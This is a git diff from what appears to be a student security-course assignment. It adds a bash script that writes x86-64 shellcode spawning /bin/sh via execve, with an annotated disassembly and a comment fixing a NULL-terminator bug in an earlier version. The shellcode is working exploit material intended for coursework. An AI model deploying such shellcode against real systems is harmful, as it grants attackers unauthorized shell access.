Assignment 4

1 files changed, 17 insertions, 0 deletions

diff --git a/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
new file mode 100755
index 0000000..63fa491
--- /dev/null
+++ b/CamilStaps-s4498062-Assignment-4/ex1/exploit/genshellcode.sh
@@ -0,0 +1,17 @@
+#!/bin/bash
+echo -e "\x48\x31\xd2\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\xb0\x3b\x0f\x05" > shellcode
+
+# This shellcode translates as follows:
+#
+#  "\x48\x31\xd2"                             // xor %rdx, %rdx
+#  "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622f2f, %rbx
+#  "\x48\xc1\xeb\x08"                         // shr $0x8, %rbx
+#  "\x53"                                     // push %rbx 
+#  "\x48\x89\xe7"                             // mov %rsp, %rdi
+#  "\x52"                                     // push %rdx      // There is an error in the "original", push %rax will push
+#                                                               // some random stuff on the stack, instead of NULL, which will 
+#                                                               // cause the execve to fail with EFAULT (-14). See man execve.
+#  "\x57"                                     // push %rdi
+#  "\x48\x89\xe6"                             // mov %rsp, %rsi
+#  "\xb0\x3b"                                 // mov $0x3b, %al
+#  "\x0f\x05"                                 // syscall
\ No newline at end of file